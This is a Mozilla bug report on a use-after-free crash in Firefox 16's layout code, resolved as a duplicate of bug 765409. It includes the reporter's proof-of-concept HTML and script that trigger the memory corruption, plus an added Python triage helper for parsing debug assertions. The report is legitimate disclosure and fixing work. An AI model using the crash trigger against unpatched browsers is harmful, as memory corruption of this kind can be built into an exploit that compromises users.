Closed Bug 802991 Opened 12 years ago Closed 12 years ago

Use-after-free in nsLineLayout

Categories

Product / Component: Core :: Layout (defect)
Version: 16 Branch
Platform: x86_64
OS: Windows 7
Type: defect
Priority: Not set
Severity: critical

RESOLVED DUPLICATE of bug 765409

People

(Reporter: abbGZcvu_bugzilla.mozilla.org, Unassigned)

Details

(Keywords: crash)

Attachments (1 file)

repro.zip, 551 bytes, application/octet-stream
Attached file repro.zip

User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4

Steps to reproduce:

The files below trigger a use-after-free in Firefox 16.0.1, causing it to crash when it tries to access data through a poisoned frame. frame.html can trigger the issue by itself; repro.html is not required but does make it easier to trigger the access violation.

--- repro.html ---
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<iframe src="frame.html"></iframe>
</body>
</html>

--- frame.html ---
<!DOCTYPE html>
<fieldset><x dir="rtl">
<script id="y" type="text/javascript">
// Remove the running script element itself from the tree.
var oScriptElement = document.getElementById("y");
oScriptElement.parentNode.removeChild(oScriptElement);
// Unclosed <x> elements and the dir="ltr" flip are intentional.
var oHtml = '<x>' +
            '<x id="x"></x>' +
            ' ' +
            '<img alt="AAAAAAAAAAAAAAAAAAAAAA c">' +
            '<x>' +
            ' ' +
            '<x dir="ltr">';
document.write(oHtml);
// Force a layout flush before mutating the DOM again.
document.documentElement.offsetTop;
var oElement = document.getElementById("x");
oElement.textContent = 'x';
</script>

Actual results:

Attempt to read from unallocated arbitrary memory (@0xF0DE8133) in xul.dll!nsLineLayout::ReflowFrame

Expected results:

No crash
Component: Untriaged → Layout
Product: Firefox → Core
I can reproduce the crash in mozilla-beta and -release debug builds on Linux64, but not -aurora or trunk. Before the crash I got these assertions:

###!!! ASSERTION: unexpected flow: 'mFrames.ContainsFrame(nextInFlow)', file layout/generic/nsInlineFrame.cpp, line 500
###!!! ASSERTION: StealFrame: can't find aChild: 'removed', file layout/generic/nsContainerFrame.cpp, line 1210
###!!! ASSERTION: StealFrame failure: 'NS_SUCCEEDED(rv)', file layout/generic/nsContainerFrame.cpp, line 1339

which points to bug 765409. After applying the patch there, the crash and assertions are gone. (The fix will land on -beta (Fx17) soon)
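A small triage helper, added here as an example and not part of the bug report or of Gecko: it pulls the `###!!! ASSERTION` lines quoted in the comment above out of a debug-build log, groups them by source file, builds a signature string for comparing one report's assertion trail against another's, and checks whether the faulting address carries the 0xF0DE prefix seen in the reporter's crash address. The poison-prefix check is an assumption drawn from that address and the reporter's "poisoned frame" description, not something the report states. The sample log is constructed from the lines on this page plus one made-up WARNING line.

```python
"""Extract Gecko debug-build assertions from a log and summarise them for
triage, so a crash can be matched against a known assertion signature
(here, the StealFrame assertions that pointed this report at bug 765409)."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Line shape as quoted in the comment above:
#   ###!!! ASSERTION: <message>: '<condition>', file <path>, line <n>
ASSERTION_RE = re.compile(
    r"###!!! ASSERTION: (?P<message>.+?): '(?P<condition>[^']*)', "
    r"file (?P<file>[^,]+), line (?P<line>\d+)"
)

# Top 16 bits of the reporter's faulting address 0xF0DE8133. Treating this as
# the frame-poison prefix is an assumption for this example; the report only
# says the access went through a poisoned frame.
POISON_PREFIX = 0xF0DE

CRASH_ADDR_RE = re.compile(r"@0x([0-9A-Fa-f]+)")


@dataclass(frozen=True)
class GeckoAssertion:
    message: str
    condition: str
    file: str
    line: int


def parse_assertions(log: str) -> List[GeckoAssertion]:
    """Return every assertion in the log, in the order it fired."""
    return [
        GeckoAssertion(m["message"], m["condition"], m["file"], int(m["line"]))
        for m in ASSERTION_RE.finditer(log)
    ]


def assertions_by_file(assertions: List[GeckoAssertion]) -> Dict[str, List[GeckoAssertion]]:
    """Group assertions by source file so the hot layout file stands out."""
    grouped: Dict[str, List[GeckoAssertion]] = {}
    for a in assertions:
        grouped.setdefault(a.file, []).append(a)
    return grouped


def signature(assertions: List[GeckoAssertion]) -> str:
    """Stable string for comparing this log's assertion trail with another's."""
    return " | ".join(f"{a.file}:{a.line} {a.condition}" for a in assertions)


def crash_address(log: str) -> int:
    """Faulting address from a '(@0x...)' crash line like the reporter's, or -1."""
    m = CRASH_ADDR_RE.search(log)
    return int(m.group(1), 16) if m else -1


def looks_poisoned(addr: int, prefix: int = POISON_PREFIX) -> bool:
    """True if a 32-bit faulting address carries the assumed poison prefix in
    its top 16 bits (the reporter's build is WOW64, so addresses are 32-bit)."""
    return (addr >> 16) == prefix


# Constructed sample log: the three assertions quoted above plus the crash
# line from the report; the WARNING line is made up for the example.
SAMPLE_LOG = """\
WARNING: NS_ENSURE_TRUE(aFrame) failed: file layout/generic/nsFrame.cpp, line 1
###!!! ASSERTION: unexpected flow: 'mFrames.ContainsFrame(nextInFlow)', file layout/generic/nsInlineFrame.cpp, line 500
###!!! ASSERTION: StealFrame: can't find aChild: 'removed', file layout/generic/nsContainerFrame.cpp, line 1210
###!!! ASSERTION: StealFrame failure: 'NS_SUCCEEDED(rv)', file layout/generic/nsContainerFrame.cpp, line 1339
Attempt to read from unallocated arbitrary memory (@0xF0DE8133) in xul.dll!nsLineLayout::ReflowFrame
"""


if __name__ == "__main__":
    found = parse_assertions(SAMPLE_LOG)
    for a in found:
        print(f"{a.file}:{a.line}  {a.message}  [{a.condition}]")
    print("signature:", signature(found))
    addr = crash_address(SAMPLE_LOG)
    print(f"crash @0x{addr:08X} poisoned={looks_poisoned(addr)}")
```

The signature is what you would compare between two reports before marking one a duplicate of the other; two logs whose assertion trails match on file, line and condition are strong candidates, as the StealFrame trail here was for bug 765409.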
Severity: normal → critical
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Keywords: crash
Resolution: --- → DUPLICATE
Group: core-security
